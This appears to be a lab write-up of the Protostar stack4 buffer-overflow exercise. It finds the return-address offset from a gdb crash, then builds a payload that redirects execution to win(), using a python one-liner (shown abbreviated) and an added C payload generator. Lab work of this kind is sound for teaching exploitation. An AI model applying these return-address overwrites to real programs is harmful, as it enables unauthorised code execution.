Encapsulating

Protostar – stack4

This exercise is about overwriting EIP. The saved return address that `ret` pops into EIP sits just above the saved EBP on the stack (possibly with some padding in between), so the first job is to find its offset from the start of the buffer. Let's piss all over the stack with a unique, non-repeating string so we can tell exactly which bytes land where:

0.08 0.14 0.10  root kali ➜  ~  pwgen 80
as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

gdb$ run 
as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0xBFFFF740  EBX: 0xB7FD7FF4  ECX: 0xBFFFF740  EDX: 0xB7FD9334  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF790  EIP: 0x67346269
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while running hook_stop:
Cannot access memory at address 0x67346269
0x67346269 in ?? ()
gdb$

0x67346269 read back as ASCII is "g4bi": that is the last four bytes of our string, "ib4g", stored little-endian (lowest byte at the lowest address). The same goes for EBP, 0x61306573, which is "se0a", the four bytes just before them. So the saved EBP starts at offset 72 and the return address at offset 76 of the 80-byte string. Now let's find win()'s address:

user@protostar:/opt/protostar/bin$ objdump -S stack4 | grep "win"
080483f4 <win>:

Fun. Let's put that address in place of the trailing "ib4g", written little-endian (\xf4\x83\x04\x08); none of those bytes is a newline, so gets() will read all of it:

user@protostar:/opt/protostar/bin$ python -c 'print("......ohbi5thoohie5keona2se0a\xf4\x83\x04\x08");' > /tmp/stack4_trick
user@protostar:/opt/protostar/bin$ gdb stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
gdb$ run < /tmp/stack4_trick 
code flow successfully changed

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0x0000001F  EBX: 0xB7FD7FF4  ECX: 0xB7FD84C0  EDX: 0xB7FD9340  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF794  EIP: 0x00000000
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while running hook_stop:
Cannot access memory at address 0x0
0x00000000 in ?? ()
gdb$

win() ran and printed its message, which is the goal. The second segfault is expected: win() has no caller of its own, so when it returns it pops the four bytes that follow our fake return address on the stack, which happened to be zero, hence EIP 0x00000000.

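To make the two manual steps above explicit (reading the offset back out of the crashed register, and packing win()'s address little-endian), here is a small C helper. It is an added example, not code from the original post or from Protostar: it takes the pwgen string and the EIP/EBP values from the gdb output above, recovers the offsets, and writes the payload file. The win() address 0x080483f4 is the one from the objdump run above; the program name mkpayload and the output path are made up. It also generalises the trick slightly: the same function works for any unique pattern and any 32-bit register value, and it checks that the final payload contains no newline, which gets() would stop at.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* The 80-byte pwgen string from the post, used as the crash pattern. */
static const char PATTERN[] =
    "as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g";

/* win() address from `objdump -S stack4 | grep win` on the Protostar VM. */
#define WIN_ADDR 0x080483f4u

/* Recover the four pattern bytes that landed in a 32-bit register and
 * return their offset inside the pattern, or -1 if they are not found.
 * x86 is little-endian, so the register's lowest byte is the byte at the
 * lowest stack address, i.e. the one that came first in the input. */
int pattern_offset(const char *pattern, uint32_t reg)
{
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((reg >> (8 * i)) & 0xffu);
    needle[4] = '\0';
    const char *hit = strstr(pattern, needle);
    return hit ? (int)(hit - pattern) : -1;
}

/* Fill `out` with `offset` filler bytes followed by `target` in
 * little-endian order, exactly as `ret` will pop it. Returns the number
 * of bytes written, or 0 if the buffer is too small or offset is bogus. */
size_t build_payload(unsigned char *out, size_t cap, int offset, uint32_t target)
{
    if (offset < 0 || cap < (size_t)offset + 4)
        return 0;
    memset(out, 'A', (size_t)offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (unsigned char)((target >> (8 * i)) & 0xffu);
    return (size_t)offset + 4;
}

/* gets() stops reading at '\n', so a target address containing 0x0a would
 * be truncated. Returns 1 if the payload reaches the stack intact. */
int survives_gets(const unsigned char *buf, size_t len)
{
    return memchr(buf, '\n', len) == NULL;
}

int main(void)
{
    /* Register values reported by gdb in the crash above. */
    int eip_off = pattern_offset(PATTERN, 0x67346269u);
    int ebp_off = pattern_offset(PATTERN, 0x61306573u);
    fprintf(stderr, "saved EBP at offset %d, return address at offset %d\n",
            ebp_off, eip_off);

    unsigned char buf[128];
    size_t len = build_payload(buf, sizeof buf, eip_off, WIN_ADDR);
    if (len == 0 || !survives_gets(buf, len)) {
        fprintf(stderr, "payload unusable\n");
        return 1;
    }
    /* Raw bytes to stdout: ./mkpayload > /tmp/stack4_trick (hypothetical names) */
    fwrite(buf, 1, len, stdout);
    return 0;
}
```

Build it with `gcc -o mkpayload mkpayload.c`, run `./mkpayload > /tmp/stack4_trick`, and feed the file to the binary with `run < /tmp/stack4_trick` inside gdb as above. Writing the bytes with fwrite rather than a shell `echo` avoids any escaping trouble with \x04 and \x08.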
Angel.
